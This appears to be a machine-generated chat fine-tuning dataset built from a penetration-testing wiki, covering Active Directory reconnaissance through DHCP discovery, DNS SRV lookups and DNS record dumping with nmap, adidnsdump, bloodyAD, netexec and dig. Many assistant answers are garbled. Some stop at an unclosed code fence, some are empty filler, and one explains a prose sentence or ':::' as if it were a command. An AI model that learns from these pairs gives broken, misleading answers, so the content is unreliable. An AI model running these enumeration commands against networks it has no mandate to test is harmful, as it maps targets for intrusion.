connecting a computer to most enterprise networks, if the Dynamic Host Configuration Protocol (DHCP) is enabled, it will assign an IP address to that computer, and send a lot of information. Nameservers and domain names are usually set through DHCP offer packets.\n\nOn UNIX-like systems, the /etc/resolv.conf file will store information for name resolution operations after the DHCP offer.\n\nThe nmap tool can be used with its broadcast-dhcp-discover.nse script to easily parse those packets.\n\n``bash\nnmap --script broadcast-dhcp-discover\n``\n\n> [!TIP]\n> In many cases, there will be MAC address filtering, static IP addressing, VLANs or other NAC (Network Access Control) and 802.1x that can prevent testers from obtaining this information. In those situations, Wireshark can be used to manually inspect broadcast and multicast packets that travel on the network and find valuable information that could help bypass those mitigations.", "metadata": {"corpus_index": 1252, "category": "network", "source_file": "docs/src/ad/recon/dhcp.md", "page_title": "DHCP", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out DHCP during a pentest?"}, {"role": "assistant", "content": "When connecting a computer to most enterprise networks, if the Dynamic Host Configuration Protocol (DHCP) is enabled, it will assign an IP address to that computer, and send a lot of information. Nameservers and domain names are usually set through DHCP offer packets.\n\nOn UNIX-like systems, the /etc/resolv.conf file will store information for name resolution operations after the DHCP offer.\n\nThe nmap tool can be used with its broadcast-dhcp-discover.nse script to easily parse those packets.\n\n``bash\nnmap --script broadcast-dhcp-discover\n``\n\n> [!TIP]\n> In many cases, there will be MAC address filtering, static IP addressing, VLANs or other NAC (Network Access Control) and 802.1x that can prevent testers from obtaining this information. In those situations, Wireshark can be used to manually inspect broadcast and multicast packets that travel on the network and find valuable information that could help bypass those mitigations."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out DHCP during a pentest?", "response": "When connecting a computer to most enterprise networks, if the Dynamic Host Configuration Protocol (DHCP) is enabled, it will assign an IP address to that computer, and send a lot of information. Nameservers and domain names are usually set through DHCP offer packets.\n\nOn UNIX-like systems, the /etc/resolv.conf file will store information for name resolution operations after the DHCP offer.\n\nThe nmap tool can be used with its broadcast-dhcp-discover.nse script to easily parse those packets.\n\n``bash\nnmap --script broadcast-dhcp-discover\n``\n\n> [!TIP]\n> In many cases, there will be MAC address filtering, static IP addressing, VLANs or other NAC (Network Access Control) and 802.1x that can prevent testers from obtaining this information. In those situations, Wireshark can be used to manually inspect broadcast and multicast packets that travel on the network and find valuable information that could help bypass those mitigations.", "metadata": {"corpus_index": 1252, "category": "network", "source_file": "docs/src/ad/recon/dhcp.md", "page_title": "DHCP", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use nmap for dhcp?"}, {"role": "assistant", "content": "nmap --script broadcast-dhcp-discover"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use nmap for dhcp?", "response": "nmap --script broadcast-dhcp-discover", "metadata": {"corpus_index": 1253, "category": "network", "source_file": "docs/src/ad/recon/dhcp.md", "page_title": "DHCP", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "nmap"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on DHCP"}, {"role": "assistant", "content": "nmap --script broadcast-dhcp-discover"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on DHCP", "response": "nmap --script broadcast-dhcp-discover", "metadata": {"corpus_index": 1253, "category": "network", "source_file": "docs/src/ad/recon/dhcp.md", "page_title": "DHCP", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `nmap --script broadcast-dhcp-discover`?"}, {"role": "assistant", "content": "This command is used for dhcp. DHCP"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `nmap --script broadcast-dhcp-discover`?", "response": "This command is used for dhcp. DHCP", "metadata": {"corpus_index": 1253, "category": "network", "source_file": "docs/src/ad/recon/dhcp.md", "page_title": "DHCP", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about DNS - Finding Domain Controllers"}, {"role": "assistant", "content": "AD-DS (Active Directory Domain Services) rely on DNS SRV RR (service location resource records). Those records can be queried to find the location of some servers: the global catalog, LDAP servers, the Kerberos KDC and so on. \n\n::: tabs\n\n=== dnsutils\n\nnslookup is a DNS client that can be used to query SRV records. It usually comes with the dnsutils package.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about DNS - Finding Domain Controllers", "response": "AD-DS (Active Directory Domain Services) rely on DNS SRV RR (service location resource records). Those records can be queried to find the location of some servers: the global catalog, LDAP servers, the Kerberos KDC and so on. \n\n::: tabs\n\n=== dnsutils\n\nnslookup is a DNS client that can be used to query SRV records. It usually comes with the dnsutils package.\n\n```bash", "metadata": {"corpus_index": 1254, "category": "active_directory", "source_file": "docs/src/ad/recon/dns.md", "page_title": "DNS", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for DNS - Finding Domain Controllers?"}, {"role": "assistant", "content": "AD-DS (Active Directory Domain Services) rely on DNS SRV RR (service location resource records). Those records can be queried to find the location of some servers: the global catalog, LDAP servers, the Kerberos KDC and so on. \n\n::: tabs\n\n=== dnsutils\n\nnslookup is a DNS client that can be used to query SRV records. It usually comes with the dnsutils package.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for DNS - Finding Domain Controllers?", "response": "AD-DS (Active Directory Domain Services) rely on DNS SRV RR (service location resource records). Those records can be queried to find the location of some servers: the global catalog, LDAP servers, the Kerberos KDC and so on. \n\n::: tabs\n\n=== dnsutils\n\nnslookup is a DNS client that can be used to query SRV records. It usually comes with the dnsutils package.\n\n```bash", "metadata": {"corpus_index": 1254, "category": "active_directory", "source_file": "docs/src/ad/recon/dns.md", "page_title": "DNS", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Other ways to find services hosts that may be DCs"}, {"role": "assistant", "content": "nslookup -type=srv _kerberos._tcp.\"$DOMAIN\"\nnslookup -type=srv _kpasswd._tcp.\"$DOMAIN\"\nnslookup -type=srv _ldap._tcp.\"$DOMAIN\"\n``\n\nThe same commands can be operated the old way with nslookup.\n\n=== nmap\n\nThe nmap tool can be used with its dns-srv-enum.nse script to operate those queries.\n\n`bash\nnmap --script dns-srv-enum --script-args dns-srv-enum.domain=\"$DOMAIN\"\n`\n\n:::\n\nIn order to function properly, the tools need to know the domain name and which nameservers to query. That information is usually sent through DHCP offers and stored in the /etc/resolv.conf or /run/systemd/resolve/resolv.conf file in UNIX-like systems. \n\nIf needed, the nameservers may be found with a port scan on the network by looking for DNS ports 53/TCP and 53/UDP.\n\n`bash\nnmap -v -sV -p 53 \"$RANGE\"\nnmap -v -sV -sU -p 53 \"$RANGE\"\n``\n\n> [!TIP]\n> The DNS service is usually offered by the domain controllers\n\nhttps://petri.com/active_directory_srv_records"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Other ways to find services hosts that may be DCs", "response": "nslookup -type=srv _kerberos._tcp.\"$DOMAIN\"\nnslookup -type=srv _kpasswd._tcp.\"$DOMAIN\"\nnslookup -type=srv _ldap._tcp.\"$DOMAIN\"\n``\n\nThe same commands can be operated the old way with nslookup.\n\n=== nmap\n\nThe nmap tool can be used with its dns-srv-enum.nse script to operate those queries.\n\n`bash\nnmap --script dns-srv-enum --script-args dns-srv-enum.domain=\"$DOMAIN\"\n`\n\n:::\n\nIn order to function properly, the tools need to know the domain name and which nameservers to query. That information is usually sent through DHCP offers and stored in the /etc/resolv.conf or /run/systemd/resolve/resolv.conf file in UNIX-like systems. \n\nIf needed, the nameservers may be found with a port scan on the network by looking for DNS ports 53/TCP and 53/UDP.\n\n`bash\nnmap -v -sV -p 53 \"$RANGE\"\nnmap -v -sV -sU -p 53 \"$RANGE\"\n``\n\n> [!TIP]\n> The DNS service is usually offered by the domain controllers\n\nhttps://petri.com/active_directory_srv_records", "metadata": {"corpus_index": 1255, "category": "active_directory", "source_file": "docs/src/ad/recon/dns.md", "page_title": "DNS", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Other ways to find services hosts that may be DCs?"}, {"role": "assistant", "content": "nslookup -type=srv _kerberos._tcp.\"$DOMAIN\"\nnslookup -type=srv _kpasswd._tcp.\"$DOMAIN\"\nnslookup -type=srv _ldap._tcp.\"$DOMAIN\"\n``\n\nThe same commands can be operated the old way with nslookup.\n\n=== nmap\n\nThe nmap tool can be used with its dns-srv-enum.nse script to operate those queries.\n\n`bash\nnmap --script dns-srv-enum --script-args dns-srv-enum.domain=\"$DOMAIN\"\n`\n\n:::\n\nIn order to function properly, the tools need to know the domain name and which nameservers to query. That information is usually sent through DHCP offers and stored in the /etc/resolv.conf or /run/systemd/resolve/resolv.conf file in UNIX-like systems. \n\nIf needed, the nameservers may be found with a port scan on the network by looking for DNS ports 53/TCP and 53/UDP.\n\n`bash\nnmap -v -sV -p 53 \"$RANGE\"\nnmap -v -sV -sU -p 53 \"$RANGE\"\n``\n\n> [!TIP]\n> The DNS service is usually offered by the domain controllers\n\nhttps://petri.com/active_directory_srv_records"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Other ways to find services hosts that may be DCs?", "response": "nslookup -type=srv _kerberos._tcp.\"$DOMAIN\"\nnslookup -type=srv _kpasswd._tcp.\"$DOMAIN\"\nnslookup -type=srv _ldap._tcp.\"$DOMAIN\"\n``\n\nThe same commands can be operated the old way with nslookup.\n\n=== nmap\n\nThe nmap tool can be used with its dns-srv-enum.nse script to operate those queries.\n\n`bash\nnmap --script dns-srv-enum --script-args dns-srv-enum.domain=\"$DOMAIN\"\n`\n\n:::\n\nIn order to function properly, the tools need to know the domain name and which nameservers to query. That information is usually sent through DHCP offers and stored in the /etc/resolv.conf or /run/systemd/resolve/resolv.conf file in UNIX-like systems. \n\nIf needed, the nameservers may be found with a port scan on the network by looking for DNS ports 53/TCP and 53/UDP.\n\n`bash\nnmap -v -sV -p 53 \"$RANGE\"\nnmap -v -sV -sU -p 53 \"$RANGE\"\n``\n\n> [!TIP]\n> The DNS service is usually offered by the domain controllers\n\nhttps://petri.com/active_directory_srv_records", "metadata": {"corpus_index": 1255, "category": "active_directory", "source_file": "docs/src/ad/recon/dns.md", "page_title": "DNS", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the The syntax for other ways to find services hosts that may be dcs?"}, {"role": "assistant", "content": "The same commands can be operated the old way with nslookup.\n\n\n=== nmap\n\nThe [nmap](https://nmap.org/) tool can be used with its [dns-srv-enum.nse](https://nmap.org/nsedoc/scripts/dns-srv-enum.html) script to operate those queries."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the The syntax for other ways to find services hosts that may be dcs?", "response": "The same commands can be operated the old way with nslookup.\n\n\n=== nmap\n\nThe [nmap](https://nmap.org/) tool can be used with its [dns-srv-enum.nse](https://nmap.org/nsedoc/scripts/dns-srv-enum.html) script to operate those queries.", "metadata": {"corpus_index": 1256, "category": "active_directory", "source_file": "docs/src/ad/recon/dns.md", "page_title": "DNS", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "The"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Other ways to find services hosts that may be DCs?"}, {"role": "assistant", "content": "The same commands can be operated the old way with nslookup.\n\n\n=== nmap\n\nThe [nmap](https://nmap.org/) tool can be used with its [dns-srv-enum.nse](https://nmap.org/nsedoc/scripts/dns-srv-enum.html) script to operate those queries."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Other ways to find services hosts that may be DCs?", "response": "The same commands can be operated the old way with nslookup.\n\n\n=== nmap\n\nThe [nmap](https://nmap.org/) tool can be used with its [dns-srv-enum.nse](https://nmap.org/nsedoc/scripts/dns-srv-enum.html) script to operate those queries.", "metadata": {"corpus_index": 1256, "category": "active_directory", "source_file": "docs/src/ad/recon/dns.md", "page_title": "DNS", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `The same commands can be operated the old way with nslookup.`?"}, {"role": "assistant", "content": "This command is used for other ways to find services hosts that may be dcs. Other ways to find services hosts that may be DCs"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `The same commands can be operated the old way with nslookup.`?", "response": "This command is used for other ways to find services hosts that may be dcs. Other ways to find services hosts that may be DCs", "metadata": {"corpus_index": 1256, "category": "active_directory", "source_file": "docs/src/ad/recon/dns.md", "page_title": "DNS", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Other ways to find services hosts that may be DCs"}, {"role": "assistant", "content": ":::\n\n\nIn order to function properly, the tools need to know the domain name and which nameservers to query. That information is usually [sent through DHCP offers](dhcp.md) and stored in the `/etc/resolv.conf` or `/run/systemd/resolve/resolv.conf` file in UNIX-like systems. \n\nIf needed, the nameservers may be found with a port scan on the network by looking for DNS ports `53/TCP` and `53/UDP`."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Other ways to find services hosts that may be DCs", "response": ":::\n\n\nIn order to function properly, the tools need to know the domain name and which nameservers to query. That information is usually [sent through DHCP offers](dhcp.md) and stored in the `/etc/resolv.conf` or `/run/systemd/resolve/resolv.conf` file in UNIX-like systems. \n\nIf needed, the nameservers may be found with a port scan on the network by looking for DNS ports `53/TCP` and `53/UDP`.", "metadata": {"corpus_index": 1257, "category": "active_directory", "source_file": "docs/src/ad/recon/dns.md", "page_title": "DNS", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `:::`?"}, {"role": "assistant", "content": "This command is used for other ways to find services hosts that may be dcs. Other ways to find services hosts that may be DCs"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `:::`?", "response": "This command is used for other ways to find services hosts that may be dcs. Other ways to find services hosts that may be DCs", "metadata": {"corpus_index": 1257, "category": "active_directory", "source_file": "docs/src/ad/recon/dns.md", "page_title": "DNS", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe DNS - Reverse lookups in the context of penetration testing"}, {"role": "assistant", "content": "In Active Directory Integrated DNS, reverse lookup zones are used to resolve IP addresses to hostnames. This operation relies on DNS PTR records. This allows to find the names of the hosts in a network. The presence of reverse lookup zones is not mandatory in Active Directory, hence limiting reverse lookup capabilities.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe DNS - Reverse lookups in the context of penetration testing", "response": "In Active Directory Integrated DNS, reverse lookup zones are used to resolve IP addresses to hostnames. This operation relies on DNS PTR records. This allows to find the names of the hosts in a network. The presence of reverse lookup zones is not mandatory in Active Directory, hence limiting reverse lookup capabilities.\n\n```bash", "metadata": {"corpus_index": 1258, "category": "active_directory", "source_file": "docs/src/ad/recon/dns.md", "page_title": "DNS", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through DNS - Reverse lookups"}, {"role": "assistant", "content": "In Active Directory Integrated DNS, reverse lookup zones are used to resolve IP addresses to hostnames. This operation relies on DNS PTR records. This allows to find the names of the hosts in a network. The presence of reverse lookup zones is not mandatory in Active Directory, hence limiting reverse lookup capabilities.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through DNS - Reverse lookups", "response": "In Active Directory Integrated DNS, reverse lookup zones are used to resolve IP addresses to hostnames. This operation relies on DNS PTR records. This allows to find the names of the hosts in a network. The presence of reverse lookup zones is not mandatory in Active Directory, hence limiting reverse lookup capabilities.\n\n```bash", "metadata": {"corpus_index": 1258, "category": "active_directory", "source_file": "docs/src/ad/recon/dns.md", "page_title": "DNS", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about DNS - Dump DNS Records in a Domain"}, {"role": "assistant", "content": "By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones, similarly to a zone transfer.\n\n::: tabs\n\n=== adidnsdump\n\nadidnsdump can be used for that purpose.\n\n``bash\nadidnsdump -u \"$DOMAIN\"\\\\\"$USER\" -p \"$PASSWORD\" ldap://\"$DC_IP\" -r\ncat records.csv\n`\n\n=== bloodyad\n\nAlternatively, it can be achieved using bloodyad.\n\n`bash\nbloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" get dnsDump\n`\n\n=== netexec\n\nnetexec's Enum_dns module utilizes WMI to dump DNS information from an Active Directory DNS Server. It extracts MicrosoftDNS_ResourceRecord (complete zone information) from all found domains.\n`bash\nnetexec smb \"$DC_IP\" -u \"$USER\" -p \"$PASSWORD\" -d \"$DOMAIN\" -M enum_dns\n`\n> [!TIP]\n> So far this module only works with Administrative privileges.\n\n=== dig\n\nIf zone transfers are allowed, dig can be used to request a zone transfer.\n\n`bash\ndig axfr @\"$DC_IP\" \"$DOMAIN\"\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about DNS - Dump DNS Records in a Domain", "response": "By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones, similarly to a zone transfer.\n\n::: tabs\n\n=== adidnsdump\n\nadidnsdump can be used for that purpose.\n\n``bash\nadidnsdump -u \"$DOMAIN\"\\\\\"$USER\" -p \"$PASSWORD\" ldap://\"$DC_IP\" -r\ncat records.csv\n`\n\n=== bloodyad\n\nAlternatively, it can be achieved using bloodyad.\n\n`bash\nbloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" get dnsDump\n`\n\n=== netexec\n\nnetexec's Enum_dns module utilizes WMI to dump DNS information from an Active Directory DNS Server. It extracts MicrosoftDNS_ResourceRecord (complete zone information) from all found domains.\n`bash\nnetexec smb \"$DC_IP\" -u \"$USER\" -p \"$PASSWORD\" -d \"$DOMAIN\" -M enum_dns\n`\n> [!TIP]\n> So far this module only works with Administrative privileges.\n\n=== dig\n\nIf zone transfers are allowed, dig can be used to request a zone transfer.\n\n`bash\ndig axfr @\"$DC_IP\" \"$DOMAIN\"\n``", "metadata": {"corpus_index": 1259, "category": "active_directory", "source_file": "docs/src/ad/recon/dns.md", "page_title": "DNS", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for DNS - Dump DNS Records in a Domain"}, {"role": "assistant", "content": "By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones, similarly to a zone transfer.\n\n::: tabs\n\n=== adidnsdump\n\nadidnsdump can be used for that purpose.\n\n``bash\nadidnsdump -u \"$DOMAIN\"\\\\\"$USER\" -p \"$PASSWORD\" ldap://\"$DC_IP\" -r\ncat records.csv\n`\n\n=== bloodyad\n\nAlternatively, it can be achieved using bloodyad.\n\n`bash\nbloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" get dnsDump\n`\n\n=== netexec\n\nnetexec's Enum_dns module utilizes WMI to dump DNS information from an Active Directory DNS Server. It extracts MicrosoftDNS_ResourceRecord (complete zone information) from all found domains.\n`bash\nnetexec smb \"$DC_IP\" -u \"$USER\" -p \"$PASSWORD\" -d \"$DOMAIN\" -M enum_dns\n`\n> [!TIP]\n> So far this module only works with Administrative privileges.\n\n=== dig\n\nIf zone transfers are allowed, dig can be used to request a zone transfer.\n\n`bash\ndig axfr @\"$DC_IP\" \"$DOMAIN\"\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for DNS - Dump DNS Records in a Domain", "response": "By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones, similarly to a zone transfer.\n\n::: tabs\n\n=== adidnsdump\n\nadidnsdump can be used for that purpose.\n\n``bash\nadidnsdump -u \"$DOMAIN\"\\\\\"$USER\" -p \"$PASSWORD\" ldap://\"$DC_IP\" -r\ncat records.csv\n`\n\n=== bloodyad\n\nAlternatively, it can be achieved using bloodyad.\n\n`bash\nbloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" get dnsDump\n`\n\n=== netexec\n\nnetexec's Enum_dns module utilizes WMI to dump DNS information from an Active Directory DNS Server. It extracts MicrosoftDNS_ResourceRecord (complete zone information) from all found domains.\n`bash\nnetexec smb \"$DC_IP\" -u \"$USER\" -p \"$PASSWORD\" -d \"$DOMAIN\" -M enum_dns\n`\n> [!TIP]\n> So far this module only works with Administrative privileges.\n\n=== dig\n\nIf zone transfers are allowed, dig can be used to request a zone transfer.\n\n`bash\ndig axfr @\"$DC_IP\" \"$DOMAIN\"\n``", "metadata": {"corpus_index": 1259, "category": "active_directory", "source_file": "docs/src/ad/recon/dns.md", "page_title": "DNS", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use adidnsdump for dns - dump dns records in a domain?"}, {"role": "assistant", "content": "adidnsdump -u \"$DOMAIN\"\\\\\"$USER\" -p \"$PASSWORD\" ldap://\"$DC_IP\" -r\ncat records.csv"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use adidnsdump for dns - dump dns records in a domain?", "response": "adidnsdump -u \"$DOMAIN\"\\\\\"$USER\" -p \"$PASSWORD\" ldap://\"$DC_IP\" -r\ncat records.csv", "metadata": {"corpus_index": 1260, "category": "active_directory", "source_file": "docs/src/ad/recon/dns.md", "page_title": "DNS", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "adidnsdump"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute DNS - Dump DNS Records in a Domain?"}, {"role": "assistant", "content": "adidnsdump -u \"$DOMAIN\"\\\\\"$USER\" -p \"$PASSWORD\" ldap://\"$DC_IP\" -r\ncat records.csv"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute DNS - Dump DNS Records in a Domain?", "response": "adidnsdump -u \"$DOMAIN\"\\\\\"$USER\" -p \"$PASSWORD\" ldap://\"$DC_IP\" -r\ncat records.csv", "metadata": {"corpus_index": 1260, "category": "active_directory", "source_file": "docs/src/ad/recon/dns.md", "page_title": "DNS", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `adidnsdump -u \"$DOMAIN\"\\\\\"$USER\" -p \"$PASSWORD\" ldap://\"$DC_IP\" -r`?"}, {"role": "assistant", "content": "This command is used for dns - dump dns records in a domain. Dump DNS Records in a Domain"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `adidnsdump -u \"$DOMAIN\"\\\\\"$USER\" -p \"$PASSWORD\" ldap://\"$DC_IP\" -r`?", "response": "This command is used for dns - dump dns records in a domain. Dump DNS Records in a Domain", "metadata": {"corpus_index": 1260, "category": "active_directory", "source_file": "docs/src/ad/recon/dns.md", "page_title": "DNS", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use bloodyAD for dns - dump dns records in a domain?"}, {"role": "assistant", "content": "bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" get dnsDump"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use bloodyAD for dns - dump dns records in a domain?", "response": "bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" get dnsDump", "metadata": {"corpus_index": 1261, "category": "active_directory", "source_file": "docs/src/ad/recon/dns.md", "page_title": "DNS", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "bloodyAD"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do DNS - Dump DNS Records in a Domain"}, {"role": "assistant", "content": "bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" get dnsDump"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about 